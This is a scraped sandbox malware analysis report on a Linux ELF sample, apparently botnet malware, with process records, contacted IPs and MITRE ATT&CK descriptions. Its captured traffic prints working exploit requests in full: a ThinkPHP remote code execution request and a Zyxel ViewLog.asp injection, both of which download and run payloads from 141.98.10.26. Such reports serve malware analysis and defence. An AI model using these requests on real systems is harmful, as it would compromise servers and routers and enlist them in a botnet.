23 34 36 3b 31 37 30 30 36 33 38 38 33 30 26 23 34 36 3b 31 35 65 62 37 37 65 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.bb81dd58.1700638830.15eb77e6</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
986	192.168.2.23	49276	112.125.209.236	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:30.811258078 CET	19495	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:31.115298033 CET	19500	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:30 GMT Server: Apache Content-Length: 11 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
987	192.168.2.23	35324	112.196.20.20	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:30.988579988 CET	19498	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
988	192.168.2.23	47648	112.15.4.125	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:31.031584024 CET	19499	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
989	192.168.2.23	33428	31.220.45.183	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:32.526663065 CET	19689	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:32.701668024 CET	19694	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:32 GMT Server: Apache Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
990	192.168.2.23	55710	94.120.39.151	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:32.569027901 CET	19690	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
991	192.168.2.23	38806	95.86.102.170	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:32.578042030 CET	19690	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

System Behavior

Analysis Process: F00D0B21M4.elf PID: 6203, Parent PID: 6119

General

Start time (UTC):	07:37:47
Start date (UTC):	22/11/2023
Path:	/tmp/F00D0B21M4.elf
Arguments:	/tmp/F00D0B21M4.elf
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	07:37:47
Start date (UTC):	22/11/2023
Path:	/tmp/F00D0B21M4.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	07:37:47
Start date (UTC):	22/11/2023
Path:	/tmp/F00D0B21M4.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	07:37:47
Start date (UTC):	22/11/2023
Path:	/tmp/F00D0B21M4.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	07:37:47
Start date (UTC):	22/11/2023
Path:	/tmp/F00D0B21M4.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: F00D0B21M4.elf PID: 6212, Parent PID: 6208

General

Start time (UTC):	07:37:47
Start date (UTC):	22/11/2023
Path:	/tmp/F00D0B21M4.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: F00D0B21M4.elf PID: 6213, Parent PID: 6208

General

Start time (UTC):	07:37:47
Start date (UTC):	22/11/2023
Path:	/tmp/F00D0B21M4.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: F00D0B21M4.elf PID: 6214, Parent PID: 6208

General

Start time (UTC):	07:37:47
Start date (UTC):	22/11/2023
Path:	/tmp/F00D0B21M4.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	07:37:47
Start date (UTC):	22/11/2023
Path:	/tmp/F00D0B21M4.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	07:37:47
Start date (UTC):	22/11/2023
Path:	/tmp/F00D0B21M4.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Source: F00D0B21M4.elf	ReversingLabs: Detection: 64%
Source: F00D0B21M4.elf	Virustotal: Detection: 64%			Perma Link

Source: unknown	TCP traffic detected without corresponding DNS query: 95.239.99.137
Source: unknown	TCP traffic detected without corresponding DNS query: 62.197.171.136
Source: unknown	TCP traffic detected without corresponding DNS query: 31.217.160.254
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.225.137
Source: unknown	TCP traffic detected without corresponding DNS query: 95.129.218.125
Source: unknown	TCP traffic detected without corresponding DNS query: 94.118.154.0
Source: unknown	TCP traffic detected without corresponding DNS query: 31.129.9.24
Source: unknown	TCP traffic detected without corresponding DNS query: 62.198.188.109
Source: unknown	TCP traffic detected without corresponding DNS query: 85.26.128.46
Source: unknown	TCP traffic detected without corresponding DNS query: 62.214.178.227
Source: unknown	TCP traffic detected without corresponding DNS query: 31.111.205.14
Source: unknown	TCP traffic detected without corresponding DNS query: 94.223.9.255
Source: unknown	TCP traffic detected without corresponding DNS query: 85.139.111.44
Source: unknown	TCP traffic detected without corresponding DNS query: 31.201.50.201
Source: unknown	TCP traffic detected without corresponding DNS query: 95.120.21.198
Source: unknown	TCP traffic detected without corresponding DNS query: 31.128.195.26
Source: unknown	TCP traffic detected without corresponding DNS query: 94.117.175.178
Source: unknown	TCP traffic detected without corresponding DNS query: 62.143.100.116
Source: unknown	TCP traffic detected without corresponding DNS query: 62.140.15.60
Source: unknown	TCP traffic detected without corresponding DNS query: 62.238.117.246
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.185.241
Source: unknown	TCP traffic detected without corresponding DNS query: 62.69.184.152
Source: unknown	TCP traffic detected without corresponding DNS query: 31.69.129.200
Source: unknown	TCP traffic detected without corresponding DNS query: 85.20.6.192
Source: unknown	TCP traffic detected without corresponding DNS query: 31.150.177.221
Source: unknown	TCP traffic detected without corresponding DNS query: 31.88.67.209
Source: unknown	TCP traffic detected without corresponding DNS query: 94.197.163.143
Source: unknown	TCP traffic detected without corresponding DNS query: 95.246.6.33
Source: unknown	TCP traffic detected without corresponding DNS query: 31.217.91.121
Source: unknown	TCP traffic detected without corresponding DNS query: 94.77.4.16
Source: unknown	TCP traffic detected without corresponding DNS query: 31.109.224.228
Source: unknown	TCP traffic detected without corresponding DNS query: 31.240.31.220
Source: unknown	TCP traffic detected without corresponding DNS query: 85.189.85.213
Source: unknown	TCP traffic detected without corresponding DNS query: 85.237.178.252
Source: unknown	TCP traffic detected without corresponding DNS query: 31.238.209.125
Source: unknown	TCP traffic detected without corresponding DNS query: 95.222.228.36
Source: unknown	TCP traffic detected without corresponding DNS query: 62.168.148.202
Source: unknown	TCP traffic detected without corresponding DNS query: 62.146.52.38
Source: unknown	TCP traffic detected without corresponding DNS query: 85.114.63.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.170.147.222
Source: unknown	TCP traffic detected without corresponding DNS query: 31.232.43.79
Source: unknown	TCP traffic detected without corresponding DNS query: 62.183.190.26
Source: unknown	TCP traffic detected without corresponding DNS query: 31.214.19.36
Source: unknown	TCP traffic detected without corresponding DNS query: 85.184.26.188
Source: unknown	TCP traffic detected without corresponding DNS query: 94.193.18.66
Source: unknown	TCP traffic detected without corresponding DNS query: 95.124.177.90
Source: unknown	TCP traffic detected without corresponding DNS query: 85.129.205.245
Source: unknown	TCP traffic detected without corresponding DNS query: 62.92.24.63
Source: unknown	TCP traffic detected without corresponding DNS query: 62.62.120.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.68.3.103

Source: F00D0B21M4.elf	String found in binary or memory: http://141.98.10.26/bins/x86
Source: F00D0B21M4.elf	String found in binary or memory: http://141.98.10.26/zyxel.sh;
Source: F00D0B21M4.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: F00D0B21M4.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report F00D0B21M4.elf

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Packets

System Behavior

Analysis Process: F00D0B21M4.elf PID: 6203, Parent PID: 6119

General

Chronological Activities

Analysis Process: F00D0B21M4.elf PID: 6205, Parent PID: 6203

General

Chronological Activities

Analysis Process: F00D0B21M4.elf PID: 6206, Parent PID: 6203

General

Chronological Activities

Analysis Process: F00D0B21M4.elf PID: 6208, Parent PID: 6203

General

Chronological Activities

Analysis Process: F00D0B21M4.elf PID: 6211, Parent PID: 6208

General

Linux Analysis Report
F00D0B21M4.elf